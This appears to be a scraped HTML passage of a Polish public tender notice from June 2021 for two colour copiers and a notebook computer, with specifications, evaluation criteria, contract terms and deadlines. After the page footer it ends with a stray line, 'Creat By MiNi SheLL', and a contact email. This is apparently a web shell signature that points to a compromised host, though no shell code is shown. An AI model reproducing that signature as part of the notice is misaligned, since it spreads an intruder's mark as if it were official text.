class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności za fakturę</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia szczegółowo został określony w opisie przedmiotu zamówienia stanowiącym załącznik nr 9 do SWZ, oraz projektowanych postanowieniach umownych stanowiących załączniki nr 7 do SWZ. Uwaga: wykonawca wypełnia szczegółowo formularz wpisując zaoferowane parametry w tabelę. Podane parametry mogą być wyższe. W tabele wpisano minimalne wymagania. <br/>Uwaga: wymagania minimalne<br/>1.	Zakup i dostarczenie fabrycznie nowych kserokopiarek w ilości 2 szt., wraz z instalacją, uruchomieniem i przeszkoleniem pracowników w zakresie obsługi zamawianego urządzenia.<br/>Parametry ogólne: <br/>technologia druku: kolorowy druku laserowy<br/>pamięć systemu : 2 GB<br/>dysk twardy : 250 GB<br/>panel dotykowy: <br/>a)	kolorowy <br/>b)	przekątna 10 cali<br/>c)	komunikaty na ekranie w języku polskim<br/>a)	interfejsy: <br/>b)	LAN 10/100/1000 Mbit<br/>c)	USB<br/>automatyczny podajnik dokumentów (kopiowanie/skanowanie): <br/>a)	ilość arkuszy: do 100 szt.<br/>b)	automatyczny dupleks: tak<br/>c)	format papieru: A6 do A3<br/>d)	gramatura papieru: 64-120 g/m2<br/>podajniki papieru: <br/>a)	dwie kasety o łącznej pojemności minimum 1000 arkuszy (format papieru A5 do A3, gramatura papieru 60-220 g/m2)<br/>b)	podajnik ręczny (boczny): 100 arkuszy (format papieru: A5-SRA3, gramatura papieru 60-250 g/m2)<br/>taca odbiorcza: 250 arkuszy<br/>uwierzytelnianie i kontrola dostępu: Uwierzytelnianie użytkownika za pomocą nazwy użytkownika i hasła <br/>podstawa pod kopiarkę: tak<br/>tonery: Urządzenie wyposażone w komplet oryginalnych tonerów producenta urządzenia<br/>trwałość bębna : minimum 50 000 stron<br/>zgodne systemy operacyjne: <br/>a)	Windows 10 (32/64)<br/>b)	Windows Server 2019<br/>Funkcja kopiowania: <br/>rozdzielczość kopiowania: 600 x 600 dpi<br/>skalowanie: 25 - 400% (przyrost o 1%)<br/>kopiowanie wielokrotne: do 999 kopii<br/>funkcja kopiowania dwustronnego: tak<br/>Funkcja drukowania: <br/>automatyczny druk dwustronny: tak (gramatura papieru: 60–220 g/m2)<br/>prędkość kopiowania A4 w czerni: do 30 stron/minutę<br/>prędkość kopiowania A4 w kolorze: do 30 stron/minutę<br/>prędkość w dupleksie A3 w czerni: do 15 stron/minutę<br/>prędkość w dupleksie A3 w kolorze: do 15 stron/minutę<br/>rozdzielczość drukowania: 1 200 x 1 200 dpi<br/>drukowanie bezpośrednie, obsługiwane typy plików: PDF, JPEG, TIFF, XPS<br/>druk mobilny: połączenie kserokopiarki z urządzeniami mobilnymi<br/>Funkcja skanowania: <br/>rozdzielczość skanowania: 600 x 600 dpi<br/>tryby skanowania: <br/>a)	e-mail<br/>b)	FTP<br/>c)	SMB<br/>d)	USB<br/>formaty plików: JPEG, TIFF, PDF<br/>funkcje skanowania: <br/>a)	podgląd skanowanych oryginałów <br/>b)	pomijanie pustych stron <br/>c)	skanowanie z możliwością automatycznego OCR do przeszukiwanego pliku PDF (rozpoznawanie języka polskiego) <br/>Usługi dodatkowe: <br/>gwarancja: 12 miesięcy (gwarancja producenta)<br/>dostarczenie urządzenia: Wniesienie, ustawienie, instalacja i uruchomienie urządzenia w pokoju wskazanym przez Zamawiającego. <br/>Oferent musi posiadać aktualne certyfikaty autoryzacji wystawiony przez Producenta dla techników, potwierdzające wiedzę i uprawnienia do świadczenia serwisu oferowanego sprzętu. <br/>szkolenie z obsługi urządzenia: Przeszkolenie pracowników wskazanych przez Zamawiającego z zakresu prawidłowej obsługi urządzenia, przeprowadzone w siedzibie Zamawiającego.<br/><br/><br/>2.	Zakup i dostarczenie fabrycznie nowego komputera przenośnego typu notebook z zainstalowanym systemem operacyjnym, dostarczonymi pakietem oprogramowania biurowego, bezprzewodową myszką komputerową i torbą przeznaczoną do notebooka – ilość 1 szt.<br/>Parametry ogólne	<br/>procesor	<br/>a)	architektura 64 bitowa,<br/>b)	osiągający w teście PassMark - CPU Mark nie mniej niż 11300 pkt., wg wyników procesorów publikowanych na stronie https: //www.cpubenchmark.net/high_end_cpus.html, wg rankingu z dnia 22.04.2021, stanowiącego załącznik nr 1 do szczegółowego opisu przedmiotu zamówienia.<br/>właściwości ekranu LCD	<br/>a)	przekątna ekranu : 17.3 cali<br/>b)	rozdzielczość: 1920 x 1080 pikseli<br/>c)	matryca: matowa / antyrefleksyjna<br/>pamięć RAM<br/>wielkość pamięci: 16 GB<br/>dysk<br/>a)	typ: SSD M.2<br/>b)	pojemność: 512 GB<br/>rodzaje wejść/wyjść <br/>a)	3x USB – minimum 2x USB 3.0 (USB 3.1 Gen.)<br/>b) wyjście słuchawkowe<br/>c)	RJ-45<br/>d)	HDMI<br/>komunikacja	<br/>a)	Wi-Fi 5 (802.11 a/b/g/n/ac)<br/>b)	LAN 10/100/1000 Mbps<br/>dodatkowe wyposażenie/funkcjonalność	kamera <br/>a)	wbudowany mikrofon<br/>b)	wbudowane głośniki<br/>system operacyjny	<br/>Microsoft Windows 10 Professional PL (64-bitowy) lub w pełni równoważny<br/>pakiet oprogramowania biurowego	<br/>Microsoft Office 2019 dla Użytkowników Domowych i Małych Firm PL, lub w pełni równoważny (licencja dożywotnia)<br/>dodatkowe informacje	<br/>a)	wydzielona klawiatura numeryczna<br/>b)	touchpad<br/>warunki gwarancji	<br/>24 miesiące (gwarancja producenta)<br/>Możliwość sprawdzenia poprzez Internet konfiguracji sprzętowych modelu notebooka oraz warunków gwarancji po podaniu numeru seryjnego bezpośrednio u producenta. Dostęp do najnowszych sterowników i uaktualnień na stronie producenta notebooka realizowany poprzez podanie na dedykowanej stronie internetowej producenta numeru seryjnego.<br/>dodatkowe akcesoria	<br/>a)	torba do notebooka 17,3 cala<br/>b)	mysz komputerowa bezprzewodowa<br/>c)	podkładka pod mysz </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30121200-5 - Urządzenia fotokopiujące</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">31 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie się kierował następującymi kryteriami oceny ofert: <br/>Cena ofertowa brutto –„C”- 60% Z tytułu niniejszego kryterium max. Ilość punków: 60<br/>Termin płatności za fakturę – „T”- 40 % Z tytułu niniejszego kryterium max. Ilość punków: 40</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności za fakturę</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">11.2.1.1.	oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 <br/>i 1086), z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenia <br/>o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej, według wzoru stanowiącego załącznik nr 5 do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 12.3.	Na ofertę składa się :<br/>12.3.1.	Formularz ofertowy – zgodnie z załącznikiem nr 1 do SWZ. <br/>12.3.2.	FORMULARZ ASORTYMENTOWY- ZGODNIE Z ZAŁ. NR 10 DO SWZ.<br/>12.3.3.	Oświadczenie (o którym mowa w pkt 11.1.1 SWZ) na podstawie art. 125 ust. 1 ustawy <br/> Pzp o niepodleganiu wykluczeniu według wzoru stanowiącego zał. nr 2 do SWZ.<br/>12.3.4.	Zobowiązanie podmiotu udostępniającego zasoby zgodnie z zał. nr 3 do SWZ (jeżeli dotyczy),<br/>12.3.5.	Oświadczenie, (o którym mowa w pkt 11.1.2 SWZ) potwierdzające brak podstaw wykluczenia tego podmiotu zgodnie z załącznikiem nr 4 do SWZ (w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby),<br/>12.3.6.	Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia (oświadczenie jest składane na podstawie art. 117 ust. 4 ustawy Pzp, z którego wynika, które dostawy wykonają poszczególni wykonawcy) – zgodnie z załącznikiem nr 8 do SWZ. (jeżeli <br/>12.3.7.	Pełnomocnictwo dla osoby podpisującej ofertę do występowania w imieniu wykonawcy, jeżeli nie wynika to bezpośrednio z dokumentów rejestrowych lub w przypadku o którym mowa w art.58 ust. 2 ustawy Prawo zamówień publicznych. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 20.	Informacja dla wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>20.3.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>20.4.	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie, o którym mowa w pkt 11.1.1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia.<br/>20.5.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z wykonawców wspólnie ubiegających się o zamówienie.<br/>20.6.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie składane na podstawie art. 117 ust. 4 ustawy Pzp, z którego wynika, które dostawy wykonają poszczególni wykonawcy – zgodnie z załącznikiem nr 8 do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 23.1.	Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty w przypadkach, o których mowa w art. 455 Pzp, oraz w przypadkach: <br/>23.1.1.	wystąpienia okoliczności niezależnych od Wykonawcy skutkujących niemożliwością dotrzymania terminu realizacji przedmiotu umowy,<br/>23.1.2.	aktualizacji rozwiązań ze względu na postęp technologiczny,<br/>23.1.3.	zmiany obowiązujących przepisów, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego,<br/>23.1.4.	wystąpienie siły wyższej. Dla potrzeb Umowy, "Siła Wyższa" oznacza zdarzenie, którego wystąpienie jest niezależne od Stron i któremu nie mogą one zapobiec przy zachowaniu należytej staranności, a w szczególności: wojny, stany nadzwyczajne, klęski żywiołowe, epidemie, ograniczenia związane z kwarantanną, embargo, rewolucje, zamieszki i strajki.<br/>23.1.5.	skrócenia terminu zakończenia realizacji umowy na pisemny wniosek Wykonawcy,<br/>23.2.	Jeżeli Wykonawca uważa się za uprawnionego do przedłużenia terminu zakończenia umowy w przypadkach o których mowa powyżej, zobowiązany jest do przekazania Zamawiającemu wniosku dotyczącego zmian umowy wraz z opisem zdarzenia lub okoliczności stanowiących podstawę do żądania takiej zmiany.<br/>23.3.	Wniosek, o którym mowa powyżej, powinien zostać przekazany niezwłocznie, jednakże nie później niż w terminie 7 dni roboczych od dnia, w którym Wykonawca dowiedział się, lub powinien dowiedzieć się o danym zdarzeniu lub okolicznościach.<br/>23.4.	Wykonawca zobowiązany jest do dostarczenia wraz z wnioskiem, o którym mowa powyżej, wszelkich innych dokumentów wymaganych umową, w tym propozycji rozliczenia i informacji uzasadniających żądanie zmiany umowy, stosowanie do zdarzenia lub okoliczności stanowiących podstawę żądania zmiany.<br/>23.5.	Po otrzymaniu wniosku, o którym mowa w ust. 2 Zamawiający jest uprawniony, bez dokonywania oceny jego zasadności, do kontroli dokumentacji, o której mowa w ust. 4 i wydania Wykonawcy polecenia przedstawienia dalszej dokumentacji bieżącej uzasadniającej żądanie zmiany. <br/>23.6.	W terminie 10 dni roboczych od dnia otrzymania żądania zmiany, Zamawiający powiadomi Wykonawcę o akceptacji żądania zmiany Umowy i terminie podpisania aneksu do Umowy lub odpowiednio o braku akceptacji zmiany.<br/>23.7.	W razie wątpliwości, przyjmuje się, że nie stanowią zmiany umowy następujące zmiany:<br/>23.7.1.	danych związanych z obsługą administracyjno-organizacyjną umowy,<br/>23.7.2.	danych teleadresowych,<br/>23.7.3.	danych rejestrowych,<br/>23.7.4.	będące następstwem sukcesji uniwersalnej po jednej ze stron umowy.<br/>23.8.	Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie w formie aneksu do umowy pod rygorem nieważności.<br/>23.9.	Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy <br/>w stosunku do treści oferty w zakresie zamiany podwykonawców w przypadku:<br/>23.9.1.	wprowadzenia podwykonawcy, <br/>23.9.2.	zmiany podwykonawcy, <br/>23.9.3.	rezygnacji podwykonawcy, <br/>23.10.	Powyższe postanowienia stanowią katalog zmian, na które zamawiający może wyrazić zgodę. Powyższe postanowienia nie stanowią zobowiązania zamawiającego do wyrażenia zgody na ich wprowadzenie.<br/>23.11.	Jeżeli Zamawiający uzna, że okoliczności wskazane przez Wykonawcę jako stanowiące podstawę do zmiany umowy nie są zasadne, Wykonawca zobowiązany jest do realizacji zadania zgodnie z warunkami zawartymi w umowie. <br/>23.12.	Zamawiający nie zamierza zawrzeć umowy ramowej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-30 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/sp_chojnice/aukcje</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-30 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-07-29</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 22.3.	Zamawiający zawiera umowę w sprawie zamówienia publicznego, z uwzględnieniem art. 577 Pzp, w terminie nie krótszym niż 5 dni od dnia przesłania zawiadomienia o wyborze najkorzystniejszej oferty, jeżeli zawiadomienie to zostało przesłane przy użyciu środków komunikacji elektronicznej, albo 10 dni, jeżeli zostało przesłane w inny sposób. <br/>22.4.	Zamawiający może zawrzeć umowę w sprawie zamówienia publicznego przed upływem terminu, o którym mowa w pkt 22.1, jeżeli w postępowaniu o udzielenie zamówienia w trybie podstawowym złożono tylko jedną ofertę. <br/>22.5.	Wykonawca, którego oferta uznana zostanie za najkorzystniejszą, będzie zobowiązany zawrzeć umowę w sprawie zamówienia na warunkach określonych w projektowanych postanowieniach umowy, które stanowią załącznik nr 7 do SWZ. Umowa zostanie uzupełniona o zapisy wynikające ze złożonej oferty. <br/>22.6.	Wykonawca, przed podpisaniem umowy, powinien przedłożyć: <br/>22.6.7.	w przypadku konsorcjum lub spółki cywilnej - umowę regulującą współpracę Wykonawców działających wspólnie (umowa konsorcjum lub umowa spółki cywilnej)<br/>22.7.	Jeżeli wykonawca, którego oferta została wybrana jako najkorzystniejsza, uchyla się od zawarcia umowy w sprawie zamówienia publicznego lub nie wnosi zabezpieczenia należytego wykonania umowy,(jeżeli było żądane) zamawiający może dokonać ponownego badania i oceny ofert spośród ofert pozostałych w postępowaniu wykonawców albo unieważnić postępowanie (art. 263 ustawy Pzp).<br/>22.8.	Wykonawca, którego oferta została wybrana jako najkorzystniejsza, zostanie poinformowany przez zamawiającego o miejscu i terminie podpisania umowy.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-21 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com